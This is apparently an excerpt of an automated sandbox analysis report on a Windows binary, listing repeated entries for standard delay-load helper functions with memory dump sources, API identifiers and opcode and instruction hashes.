                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 7c4f774842aa1b57f826ffa536ca04e9abef5484413cb1a0b25dfd292227c235
                                                                                                    • Instruction ID: 178a3d4d80ae92c0b8a85791502920bc69e07f0dc77f12efb59f758e6c418f5c
                                                                                                    • Opcode Fuzzy Hash: 7c4f774842aa1b57f826ffa536ca04e9abef5484413cb1a0b25dfd292227c235
                                                                                                    • Instruction Fuzzy Hash: C5B012F139A200BD314851252C0BCF7014CD4C1F10330713EFC06F0281D840ADC10571
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 9e243448f2014e017d96d4ab0056628c98d6c69261b16ed6ba0679ad5235411f
                                                                                                    • Instruction ID: 6993a3a4fedcfe7352210d29121f74e4a839574a41f772ebd74f68e315a07bbc
                                                                                                    • Opcode Fuzzy Hash: 9e243448f2014e017d96d4ab0056628c98d6c69261b16ed6ba0679ad5235411f
                                                                                                    • Instruction Fuzzy Hash: 63B012F139A100BC310855252D0BCF7014CD4C1F10330703EFC06F0281DC40AE820531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 55c1f9d72fefcece00a2d6c2db55064b3670557a6045d0b57177fef43e6570c2
                                                                                                    • Instruction ID: 45d887969c769a7e063d4f4e551036953b01359ad36dd79ec53a0ff488ea5c6a
                                                                                                    • Opcode Fuzzy Hash: 55c1f9d72fefcece00a2d6c2db55064b3670557a6045d0b57177fef43e6570c2
                                                                                                    • Instruction Fuzzy Hash: 91B012F139A100BC310851262C0BCF7014CE4C1F10330703EFC06F0281D840AD810531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 53456d08a4075de6f9cffe44b119696888e9e7e3322e43c08dde33ff21e1a83f
                                                                                                    • Instruction ID: 33258b9870517a0cb993c9f680ddf3acbe670b7106764d0adee44e69236c5e90
                                                                                                    • Opcode Fuzzy Hash: 53456d08a4075de6f9cffe44b119696888e9e7e3322e43c08dde33ff21e1a83f
                                                                                                    • Instruction Fuzzy Hash: FCB012F13AA240BD314852252C0BCF7014CD4C1B20330B23EFC06F0381D840ACC50531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 7391af25d007d445f6bf8d6397cffa745f75a98e3de3150d69998167613a0046
                                                                                                    • Instruction ID: 66c917dc6adc3fda00ce2f04667628cba0de5ce9412f137e5657d085b87ad211
                                                                                                    • Opcode Fuzzy Hash: 7391af25d007d445f6bf8d6397cffa745f75a98e3de3150d69998167613a0046
                                                                                                    • Instruction Fuzzy Hash: 99B012F139A100BC310852252D0BCF7014CD4C1B20330B13EFC06F0381DC50AD8A0531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 6ff04239c71bf2bb253912281fbdc1f3c70542fec3e81727785c801a95997d1f
                                                                                                    • Instruction ID: 863b5bd3a6477540cd803b18b3f8ff32e692ac86980a0ef7fa60fb3115d7358c
                                                                                                    • Opcode Fuzzy Hash: 6ff04239c71bf2bb253912281fbdc1f3c70542fec3e81727785c801a95997d1f
                                                                                                    • Instruction Fuzzy Hash: 75B012F139A100BC310851252C0BCF7014CD4C2F10330B03EFC06F0281D840ED850531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: 00f28ff26f769abcdd77d524cd6f6bf3c91962a5428d63f4fac2ba2cf93eb314
                                                                                                    • Instruction ID: ea94bd740397dd556f90ad1df890b4d296ee8dc1b1a98e709c6e1835d1320ba6
                                                                                                    • Opcode Fuzzy Hash: 00f28ff26f769abcdd77d524cd6f6bf3c91962a5428d63f4fac2ba2cf93eb314
                                                                                                    • Instruction Fuzzy Hash: 05B012E16992007C310851646D07CB745ADC4C1F10374722EFC04F1280EC404D820531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: f6e01ed89361aeb03ce7d182d6606f53c13f88ca3bb48c1723ad20052766bea5
                                                                                                    • Instruction ID: 96db915b5164e4858b0655c8ae383a482d782422055562a2adbd2f275b696635
                                                                                                    • Opcode Fuzzy Hash: f6e01ed89361aeb03ce7d182d6606f53c13f88ca3bb48c1723ad20052766bea5
                                                                                                    • Instruction Fuzzy Hash: CDB012E16993007D314851646C07CB705ADC4C1F10334722EFC04F1280E8404CC10531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: 665617811dd496815a528854d28907ecee018fff2c86cb73c9d0786db26faf4e
                                                                                                    • Instruction ID: 5998e9cb3ac76115d462a88a66feee5dcff1cd06c7aa22c6050026b23daecd1c
                                                                                                    • Opcode Fuzzy Hash: 665617811dd496815a528854d28907ecee018fff2c86cb73c9d0786db26faf4e
                                                                                                    • Instruction Fuzzy Hash: 46B012E169A2007D310851642C07CB7018DD4C1F20330702EFC04F1680E8404C810531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    • Opcode ID: cffe0992be73548cf342d634067d3a808818f59371d48c5ac9bd68bac99ada2d
                                                                                                    • Instruction ID: f7c810e32063dc1d1c7b36ff02d61420a338482f1b2d59c866d3a9ec698015ca
                                                                                                    • Opcode Fuzzy Hash: cffe0992be73548cf342d634067d3a808818f59371d48c5ac9bd68bac99ada2d
                                                                                                    • Instruction Fuzzy Hash: 3AB012E12982007C324852186C07CBB095EC4C1F10330722EFC04F0280E8404CC90631
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: d0a0d2ee7dbb9b21e739e27a7ab563fb40f687698faa31d0a73f4ae8db732cde
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: d0a0d2ee7dbb9b21e739e27a7ab563fb40f687698faa31d0a73f4ae8db732cde
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: da0f33cd1f0cf5a6b1fb3dc5f9485f8af8d89dd78d592e25e3e7e135ba550c40
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: da0f33cd1f0cf5a6b1fb3dc5f9485f8af8d89dd78d592e25e3e7e135ba550c40
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 85165d6f684004f0153270e43041af3252343194f79a8782280afe0d4edf3d74
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: 85165d6f684004f0153270e43041af3252343194f79a8782280afe0d4edf3d74
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 28530365780b5150a9edc2e38cf053ab8c15db8b6bf46c57c88a338e9af58ccf
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: 28530365780b5150a9edc2e38cf053ab8c15db8b6bf46c57c88a338e9af58ccf
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: d334d90a603b2dc6a39144c1fd8ec6b795a7d4fe83f843aebf2d93cac0ed87c7
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: d334d90a603b2dc6a39144c1fd8ec6b795a7d4fe83f843aebf2d93cac0ed87c7
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: a564e80c3c29c832b570d653396bed0aa4143d068112b7ce0debac75a7a49ad9
                                                                                                    • Instruction ID: 57ea32f08cd108849e139c8f8d326aaa4a7b66c817cd98593b391720f3177f13
                                                                                                    • Opcode Fuzzy Hash: a564e80c3c29c832b570d653396bed0aa4143d068112b7ce0debac75a7a49ad9
                                                                                                    • Instruction Fuzzy Hash: 08A011E2AA8202BC300822A02C0BCBB028EC8C0F20330B82EFC02B0280A88008820830
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: 3a0171e87098a6aacaf451cc710fef1d7d10842d732f73b0f5932f9653ad3a5f
                                                                                                    • Instruction ID: 57ea32f08cd108849e139c8f8d326aaa4a7b66c817cd98593b391720f3177f13
                                                                                                    • Opcode Fuzzy Hash: 3a0171e87098a6aacaf451cc710fef1d7d10842d732f73b0f5932f9653ad3a5f
                                                                                                    • Instruction Fuzzy Hash: 08A011E2AA8202BC300822A02C0BCBB028EC8C0F20330B82EFC02B0280A88008820830
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
